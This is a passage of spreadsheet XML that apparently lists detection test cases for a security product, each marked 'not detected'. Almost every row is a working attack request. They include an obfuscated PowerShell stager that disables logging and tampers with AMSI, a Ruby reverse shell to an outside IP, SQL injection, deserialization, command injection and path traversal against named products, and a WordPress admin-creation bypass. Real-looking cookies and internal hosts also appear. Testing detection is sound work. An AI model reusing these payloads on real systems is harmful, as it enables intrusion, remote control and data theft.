handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%27java.lang.Runtime.getRuntime%28%29.exec%28new%20java.lang.String%5b%5d%20%7b%22cmd.exe%22%2c%20%22/c%22%2c%20new%20java.lang.String%28java.util.Base64.getDecoder%28%29.decode%28%22cG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLW5vbmkgLWMgImlmKFtJbnRQdHJdOjpTaXplIC1lcSA0KXskYj0kZW52OndpbmRpcisnXHN5c25hdGl2ZVxXaW5kb3dzUG93ZXJTaGVsbFx2MS4wXHBvd2Vyc2hlbGwuZXhlJ31lbHNleyRiPSdwb3dlcnNoZWxsLmV4ZSd9OyRzPU5ldy1PYmplY3QgU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NTdGFydEluZm87JHMuRmlsZU5hbWU9JGI7JHMuQXJndW1lbnRzPSctbm9uaSAtbm9wIC13IGhpZGRlbiAtYyAgJGV6Tj1bQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5W3N0cmluZyxTeXN0ZW0uT2JqZWN0XV06Om5ldygpOyAkY2g9KCgnJ0VuYXsyfWxlJycrJyd7MH1jJycrJydyaXAnJysnJ3szfUJsb2MnJysnJ3snJysnJzF9TG9nZ2luZycnKS1mJydTJycsJydrJycsJydiJycsJyd0JycpOyAkcHhVUT0oKCcnU2NyaScnKycncHsxfUJ7MH1vYycnKycna0xvJycrJydnZ2l7Mn1nJycrJycnJyktZicnbCcnLCcndCcnLCcnbicnKTtJZigkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uLk1ham9yIC1nZSAzKXsgJHF5Uz1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCgoJyd7NH17MX0nJysnJ3N0ZW0uJycrJyd7JycrJyc1JycrJyd9JycrJydhbmF7MicnKycnfWVtZW4nJysnJ3QuJycrJyd7N317MH10eycnKycnOH0nJysnJ20nJysnJ2F0ezl9eycnKycnOH1uLicnKycnezd9bXN7OScnKycnfXs2JycrJyd9JycrJyd0eycnKycnOX17JycrJyczJycrJyd9JycrJydzJycpLWYnJ3UnJywnJ3knJywnJ2cnJywnJ2wnJywnJ1MnJywnJ00nJywnJ1UnJywnJ0EnJywnJ28nJywnJ2knJykpOyAkaVJrPVtSZWZdLkFzc2VtYmx5LkdldFR5cGUoKCgnJ1N7MX1zdGVtLicnKycnezJ9YW5hezN9ZScnKycnbWVudCcnKycnLns1fXUnJysnJ3RvJycrJydtYXRpb24uezAnJysnJ310aXs0fXMnJysnJycnKS1mJydVJycsJyd5JycsJydNJycsJydnJycsJydsJycsJydBJycpKTsgJHRnPSgoJydFbicnKycnYXsyfWxlU2NyaXB0ezN9bCcnKycnbycnKycnY3swJycrJyd9JycrJyd7NX1uezF9b2NhdGlvbnsnJysnJzR9JycrJydvZ2dpbmcnJyktZicnaycnLCcndicnLCcnYicnLCcnQicnLCcnTCcnLCcnSScnKTsgJGpxMj0kaVJrLkdldEZpZWxkKCcnY2FjaGVkR3JvdXBQb2xpY3lTZXR0aW5ncycnLCcnTm9uUHVibGljLFN0YXRpYycnKTsgaWYgKCRxeVMpIHsgJHF5Uy5HZXRGaWVsZCgoKCcnJycrJydhezR9JycrJyd7MCcnKycnfWknJysnJ0knJysnJ3syfWl7JycrJyczfUZhJycrJydpezF9JycrJydlZCcnKS1mJydzJycsJydsJycsJyduJycsJyd0JycsJydtJycpLCcnTm9uUHVibGljLFN0YXRpYycnKS5TZXRWYWx1ZSgkbnVsbCwkdHJ1ZSk7IH07IElmICgkanEyKSB7ICRiMElUPSRqcTIuR2V0VmFsdWUoJG51bGwpOyBJZigkYjBJVFskcHhVUV0peyAkYjBJVFskcHhVUV1bJHRnXT0wOyAkYjBJVFskcHhVUV1bJGNoXT0wOyB9ICRlek4uQWRkKCR0ZywwKTsgJGV6Ti5BZGQoJGNoLDApOyAkYjBJVFsnJ0hLRVlfTE9DQUxfTUFDSElORVxTb2Z0d2FyZVxQb2xpY2llc1xNaWNyb3NvZnRcV2luZG93c1xQb3dlclNoZWxsXCcnKyRweFVRXT0kZXpOOyB9IEVsc2UgeyBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCgoJycnJysnJ1MnJysnJ3swfXN0ZScnKycnbS57MScnKycnfWFuJycrJydhZ2VtZW50LnszJycrJyd9ezJ9dG9tYXRpJycrJydvbi5TY3s0fWlwdEJ7NX1vJycrJydjaycnKS1mJyd5JycsJydNJycsJyd1JycsJydBJycsJydyJycsJydsJycpKS5HZXRGaWVsZCgnJ3NpZ25hdHVyZXMnJywnJ05vblB1YmxpYyxTdGF0aWMnJykuU2V0VmFsdWUoJG51bGwsKE5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5IYXNoU2V0W3N0cmluZ10pKTsgfX07Jihbc2NyaXB0YmxvY2tdOjpjcmVhdGUoKE5ldy1PYmplY3QgU3lzdGVtLklPLlN0cmVhbVJlYWRlcihOZXctT2JqZWN0IFN5c3RlbS5JTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKChOZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKCgnJ0g0c0lBSHo2R21NQ0E3VlgrMi9pU0JMK2ZhWDlINndWRWtaRHdFNUlkakxTU0dkakc1dkI1dUZYZ0VVbll6ZDJROXNtZmdTVHZmM2ZyOXBBa3RGa2R1ZE9tcFpRM0k5NjlGZGZWVmMyWmVJWE9FMlk0MkhJL3swfW5yTDh4NVRMek1peG0yRVc0R2JhYXgxbHEnJysnJ3ZXNDF5VjZJajg1bGhsOEorTDZXeGg1ezB9VnAwLzlNc3RRVXB6bW5RRXFoRHhIOFpwZ2xMTXQ1aitNRzZFTVhZM1hXK1FYJycrJyd6SjlNNDkrZEFVblhIamtmTy9ZOXswfTBMTWxaQUVkRytVK2g3MXEyezB9dUNTN1k1aDkvTkZ2TEszN1ZrUjlMaitSczB6em1CWW83QVNITkZ2TlhpeHEwam52RU5uWHNaMm1lYm9xT2k1T2I2NDZkNU40R0dhRHRDZW1vaScnKycnTklnYjgnJysnJ0p0WHUrVG9hTE1rdk8xcUo3VEtiWUpuNU1zOVlVZ3lGQ2VOOXZNa2xwWXJsYi9ZcGRuODdNeUtYQ01PbHBTb0N6ZG15aDd3ajdLTzZxWEJBVE4wR1lGVW1hUjRTUmN0VnB3N0NuZEliYVJsSVMwbWY5RkRXJycrJyd1Z3d3VzhIeFZpM3dyQnFVbVJ0ZG9RMC9jdXFxZEJTZEJKdHswfW1PcDVRSUxSZ25NZ0IrZjFFSU54ZjI1QTlDVWJ6RG45ZUZ5MWpXT3doY1ppZHBqbXZwend6WFpuU3c3UlZwUnBuVnNMSVN0Vll2Z0RPJycrJydOT0dyL3FDNytJZ2hpai8wWnJDeWRGQWVyVi9tdnd0ODRhezB9VEk5Nmtzb1ExT2tIUk12Qmo3RjdheTd3VUViUWlxOGVoY2pobmdIdHM4YjZCQVFnU0ZYa0VScHJ6NFJreU9jZkVpSzVhWUJDZ1RmQWhxRGw1QnZGdGZPM01LR3R2VUVoM0ZnTnhwRGtSdGJDQkgwT1gwT1MrT0YrdDBEb2VhZmVMbGVadVpsSkNrZnBzeGtVZFEwR2FFSk1mbkxhRXMwdnF6K2VxdVhwSUMrMTVlWE5TdFdsK0JlVGJhVDVPOHlFb2ZJZ29BV09ZZStkZ2pGSTgybytJQScnKycnaVVjVGh4Zmp6WGZSNkh1RVFPS0FwaScnKycnZUlCcXhRRk15QzhpUUR7MH00RVRyWTZKQ2kzZUV4VERpYnBnS01RTG9UeWNrNk9tbFJlaW97MH1tdWs1Y0VPTEdkWW5JQjQ0MkxFR2lUcEVXYmNYQldRezB9R2grQUt2L2c4SHZxMDU0RWsvUStlWXNKZTBXb3JIZ3RLK2tkenRTNXV5OHd4T0RVVldBQXhLbHNhaWw2TzczcW02c0w5MVpTemRUcVQwV1lBaEs3T3BJNXEyczlEMFlFaE1yVERuTWg3WlVhUmhYZ3RoZnJSbHJqcmE0YVRnOWw5TVNSVXlxWW8yZ3BacnNpb2VwN3dvK0NyKzNSbUt0ZzF5dUQrYWJpdE5DTVE0ZkFqbi9ZTTJpUjQwTU5RZmhWb0lmMFV0OGtWdXdZVWlwNGd5NW9UUW5LcFR6SVh6SHI4d2RKOW8zWTlFeE0rbVpncXFTKzFOZlhVb2VSWFlrWHM5OWFHeUJFTWZDcEV5RGhUK1dvbW9qaDNWc2RnTlJwSmN6MzA2bjg1ekdjdGdSMWJtVXlkQ3JyTVhYVmxaVEoyOUZuNDRoRk5uMU8wcGtRanInJysnJ0dxNUdlN01MZytjQmg4SXkxN2Mzbm51N1g4Y09CeGk1cHBaRXByL3BXNm9maTkydVkvT0docEZpdVR1dU9sQjhIQU5rMGpzbmlSTUtxekRwT25kaS9WV05MYTNVclhsdnROVzRjYjlYNmMrYTRPN3c4R0FuNm1HU0EnJysnJ3lnaXZiZGxYNmVTemNWM1RpL2VWQlFxUWVyeWFPdlNyeEYvL3poVFo0TTVMNW97MH12REVaRC9RYi9TRjgxdU5LblhKS0wxQUNSUjhZNW13cjN2cURSVHh6akNKd0FFOGxlbHhMOHZ7MH1ZMXA5MVorRjZxbjA5ZHNqWWNFaXlIbFRtZW1lVWhyWGpiQ0pPJycrJydmQ2U0OHgvMnFhTU9iWU5NajY0VGJXZicnKycnMkxUK3pGN08xR294bmcyQzJjQU5yNU83N0ZnOHh2REcrZ0p4a3VtVGpLb3ZCL0ZrMDdHM0V1WU84c2dkRHgxVURKMUFkeGI4ZWNnWW5WODZOWTNqTy9HaVJoVzV4a2VaSTBkUycnKycnbDlvbHk3Y2F6Mll5cjVxWkZibTM3L2xGM1ppTm4wT3swfU5PTEFzTitYVzNIMisyQTIvb0Yzd0hPd08xNllxeXRPYmhZZWNtU3swfUlnQ1dvaGhqWE9KcWpVTkFmcycnKycnVnlqcjRpV3pRSE9aZUdNdGs5ZDNzYkRLazYvezB9SEI0K05GTk4nJysnJ3k0WnBxR2tReDdFdzk0Z2xhY09HWmFKTTBqU2VTM2V2WGRBcCcnKycnMmpSZUgyMGFSNmMnJysnJ1l3MWNHRTNuY3dSY0FEN3pLcmRWRC97MH1RZ2xnT3k1MTFNSkJ3a1FjKzMzTkNXVDdlS1RibHYrVzZlNGgvezB9T1EnJysnJ2diMlFaZkJPRWFTMUg4TTcrWUwvSTdYaXdveVVKL0NyNGVXQVQwa2lvZmYxZ3gzZnkzaHYyTGp5eHNWVDErOHBCTlkrTE5GY2hkeVRxRjBlMmtqdElCWmR5N2FuezB9cDJUZDVhZWZ7MH0vOEcnJysnJ0ZXUnA0NlM0dVY0MW5xMzUwNWErcmIvKzBxaWs3RTBaK1Y3bm9IdFpIbmtFeWcnJysnJ3QwQkpmeXJxU1pjbjdtSnltbUVpeExtOFVkeWhKRW9NR0NGdXhTR2dWQ1VwLzJHS2QrQUJxY1U5dEJ1eUJicTkxNjc2dkZ2QnhzdmZZZWw2VnswfW54YmdKWlRidWhwMlJpZ0ppNicnKycnak5WVGNjQjIwRFYzRzl1clQrK09YNjZmN0luclMxYWVkQjBYbFJUMnIxb0JGdkdKYjk2WWhCZzEnJysnJ25BYy9jM21IMHswfXswfXJDOWd5Y0szc3ZUMjBGQkZOT1V2SVh3ZExNWFJud0ZJQ0RIdytXWHRMczhjUVZVWEtGJycrJydIcGxIUTV1dHRNJycrJyc5YzQ5SDRxZTg1ezB9WUFSL2duOWt6K3ZhMyt6K0VLTzRkbzN7MH1ONnRmTDd4cEhINGVBcTZIQ3pob3drdE8wS21yL0E0UTU0eDVFK05ERDVKaGN4NzB7MH02JycrJycxeFdWd1owTGZYM2NSL0FjT1pEVXJoRFFBQScnKS1mJydQJycpKSkpLFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKSkpJzskcy5Vc2VTaGVsbEV4ZWN1dGU9JGZhbHNlOyRzLlJlZGlyZWN0U3RhbmRhcmRPdXRwdXQ9JHRydWU7JHMuV2luZG93U3R5bGU9J0hpZGRlbic7JHMuQ3JlYXRlTm9XaW5kb3c9JHRydWU7JHA9W1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzXTo6U3RhcnQoJHMpOyI%3d%22%29%29%7d%29%27%29</t>
        </is>
      </c>
      <c r="D54" s="0">
        <f>_xlfn.ENCODEURL(C54)</f>
        <v/>
      </c>
    </row>
    <row r="55" ht="23.6" customHeight="1" s="6" thickBot="1">
      <c r="A55" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：HSQLDB &gt; 2.0 时间型盲注 - 参数替换 (heavy query)</t>
        </is>
      </c>
      <c r="B55" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C55" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%28SELECT%20%28CASE%20WHEN%20%283701%3D3701%29%20THEN%20REGEXP_SUBSTRING%28REPEAT%28LEFT%28CRYPT_KEY%28CHAR%2865%29%7C%7CCHAR%2869%29%7C%7CCHAR%2883%29%2CNULL%29%2C0%29%2C500000000%29%2CNULL%29%20ELSE%20CHAR%28106%29%7C%7CCHAR%2898%29%7C%7CCHAR%28102%29%7C%7CCHAR%2878%29%20END%29%20FROM%20%28VALUES%280%29%29%29--%20PRkX&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D55" s="0">
        <f>_xlfn.ENCODEURL(C55)</f>
        <v/>
      </c>
    </row>
    <row r="56" ht="23.6" customHeight="1" s="6" thickBot="1">
      <c r="A56" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：HSQLDB &gt;= 1.7.2 时间型盲注 - 参数替换 (heavy query)</t>
        </is>
      </c>
      <c r="B56" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C56" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%20AND%20CHAR%28104%29%7C%7CCHAR%2872%29%7C%7CCHAR%28106%29%7C%7CCHAR%2899%29%3DREGEXP_SUBSTRING%28REPEAT%28RIGHT%28CHAR%286161%29%2C0%29%2C5000000000%29%2CNULL%29--%20fVrS&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D56" s="0">
        <f>_xlfn.ENCODEURL(C56)</f>
        <v/>
      </c>
    </row>
    <row r="57" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A57" s="2" t="inlineStr">
        <is>
          <t>FactoryTalk反序列化漏洞利用</t>
        </is>
      </c>
      <c r="B57" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C57" s="0" t="inlineStr">
        <is>
          <t>POST /FactoryTalkLogReader HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 1338
Accept-Encoding: identity
Content-Type: application/octet-stream
......................)System.Security.Principal.WindowsIdentity....$System.Security.ClaimsIdentity.actor.......	AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAtgU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY2FsYy5leGUiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==.</t>
        </is>
      </c>
      <c r="D57" s="0">
        <f>_xlfn.ENCODEURL(C57)</f>
        <v/>
      </c>
    </row>
    <row r="58" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A58" s="2" t="inlineStr">
        <is>
          <t>.git敏感文件信息泄露</t>
        </is>
      </c>
      <c r="B58" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C58" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /.git/config HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D58" s="0">
        <f>_xlfn.ENCODEURL(C58)</f>
        <v/>
      </c>
    </row>
    <row r="59" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A59" s="2" t="inlineStr">
        <is>
          <t>D-link 823pro v1.0.2命令执行（CVE-2022-28573）</t>
        </is>
      </c>
      <c r="B59" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C59" s="0" t="inlineStr">
        <is>
          <t>POST /HNAP1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 71
Accept-Encoding: identity
Content-Type: application/json
Hnap_auth: 84E9E7AB41420A00EC4C179066EAF998 1646491157369
Soapaction: "http://purenetworks.com/HNAP1/SetNTPServerSettings"
{"SetNTPServerSettings":{"system_time_timezone":"$(ls &gt; /www/web/ls)"}}</t>
        </is>
      </c>
      <c r="D59" s="0">
        <f>_xlfn.ENCODEURL(C59)</f>
        <v/>
      </c>
    </row>
    <row r="60" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A60" s="2" t="inlineStr">
        <is>
          <t>WordPress MasterStudy LMS 安全绕过</t>
        </is>
      </c>
      <c r="B60" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C60" s="0" t="inlineStr">
        <is>
          <t>POST /wp-admin/admin-ajax.php?action=stm_lms_register&amp;nonce=[NONCE] HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 325
Accept-Encoding: identity
Content-Type: application/json
X-Requested-With: XMLHttpRequest
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}</t>
        </is>
      </c>
      <c r="D60" s="0">
        <f>_xlfn.ENCODEURL(C60)</f>
        <v/>
      </c>
    </row>
    <row r="61" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A61" s="2" t="inlineStr">
        <is>
          <t>HPE远程代码执行</t>
        </is>
      </c>
      <c r="B61" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C61" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /imc/icc/taskmng/viewBatchTaskResultDetailFact.xhtml;.jar?queryType=1&amp;beanName=facesContext.getClass%28%29.getClassLoader%28%29.getSystemClassLoader%28%29.loadClass%28%22javax.script.%22.concat%28%22ScriptEngineManager%22%29%29.newInstance%28%29.getEngineByName%28%22js%22%29.eval%28%22java.lang.Runtime.getRuntime%28%29.exec%28%5C%22calc%5C%22%29%22%29 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D61" s="0">
        <f>_xlfn.ENCODEURL(C61)</f>
        <v/>
      </c>
    </row>
    <row r="62" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A62" s="2" t="inlineStr">
        <is>
          <t>linuxKi6.01远程命令注入</t>
        </is>
      </c>
      <c r="B62" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C62" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET //linuxki/experimental/vis/kivis.php?type=kitrace&amp;pid=15;echo%20BEGIN;%25s;echo%20END; HTTP/1.1
Host: 10.66.245.125
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://10.66.245.125//linuxki/experimental/vis/kivis.php?type=kitrace&amp;pid=15;echo%20BEGIN;%25s;echo%20END;
Cookie: 78nh_2132_saltkey=mDoEHu44; 78nh_2132_lastvisit=1590391575; 78nh_2132_sid=G675wu; 78nh_2132_lastact=1590396306%09index.php%09
Upgrade-Insecure-Requests: 1
</t>
        </is>
      </c>
      <c r="D62" s="0">
        <f>_xlfn.ENCODEURL(C62)</f>
        <v/>
      </c>
    </row>
    <row r="63" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A63" s="2" t="inlineStr">
        <is>
          <t>CentOS Web Panel本地文件包含漏洞利用</t>
        </is>
      </c>
      <c r="B63" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C63" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /admin/index.php?module=file_editor&amp;file=/../../../../../../../../../../../etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D63" s="0">
        <f>_xlfn.ENCODEURL(C63)</f>
        <v/>
      </c>
    </row>
    <row r="64" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A64" s="2" t="inlineStr">
        <is>
          <t>Elasticsearch命令执行</t>
        </is>
      </c>
      <c r="B64" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C64" s="0" t="inlineStr">
        <is>
          <t>POST /_search?pretty HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 356
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}</t>
        </is>
      </c>
      <c r="D64" s="0">
        <f>_xlfn.ENCODEURL(C64)</f>
        <v/>
      </c>
    </row>
    <row r="65" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A65" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：大小写绕过</t>
        </is>
      </c>
      <c r="B65" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C65" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /sqLServer/SeArcH/sEarch.AsP?name=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D65" s="0">
        <f>_xlfn.ENCODEURL(C65)</f>
        <v/>
      </c>
    </row>
    <row r="66" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A66" s="2" t="inlineStr">
        <is>
          <t>Cisco Data Center Network Manager命令注入</t>
        </is>
      </c>
      <c r="B66" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C66" s="0" t="inlineStr">
        <is>
          <t>POST /rest/fabrics HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 428
Accept-Encoding: identity
Content-Type: application/json
{"generalSetting": {"provisionOption": "Manual", "asn": "1337"}, "name": "svpflyxm\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"172.16.19.91\",\"1337\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\"", "provisionSetting": {"amqpSetting": {"server": "127.0.0.1:1337"}, "dhcpSetting": {"primarySubnet": "127.0.0.1", "primaryDNS": "127.0.0.1", "secondaryDNS": "127.0.0.1"}, "ldapSetting": {"server": "127.0.0.1"}}}</t>
        </is>
      </c>
      <c r="D66" s="0">
        <f>_xlfn.ENCODEURL(C66)</f>
        <v/>
      </c>
    </row>
    <row r="67" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A67" s="2" t="inlineStr">
        <is>
          <t>Mikrotik-Router-Monitoring-System SQL注入</t>
        </is>
      </c>
      <c r="B67" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C67" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI HTTP/1.1
Host: 192.168.18.71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.18.71/xinge/login_page.php
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4a6arunmnkjn5bc77kqefqcao2
Connection: close
</t>
        </is>
      </c>
      <c r="D67" s="0">
        <f>_xlfn.ENCODEURL(C67)</f>
        <v/>
      </c>
    </row>
    <row r="68" ht="23.6" customHeight="1" s="6" thickBot="1">
      <c r="A68" s="2" t="inlineStr">
        <is>
          <t>FFasterXML/jackson-databind json转java对象远程代码执行</t>
        </is>
      </c>
      <c r="B68" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C68" s="0" t="inlineStr">
        <is>
          <t>POST /apps/zealot/ipszealot/savepcap/24535 HTTP/1.1
Host: rules.intra.nsfocus.com
Connection: keep-alive
Content-Length: 289
Accept: */*
Origin: http://rules.intra.nsfocus.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryexJikj3YU29aziBL
Referer: http://rules.intra.nsfocus.com/apps/zealot/ipszealot/uploadpcap/24535
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: tvrsid=uw7dyzdy9zqt6wxoyah90av0z30jyly8; top_menustatue_NSFOCUS 威胁响应和产品规则管理系统=1,3,3
------WebKitFormBoundaryexJikj3YU29aziBL
Content-Disposition: form-data; name="pcap"; filename="2020-8840.json"
Content-Type: application/json
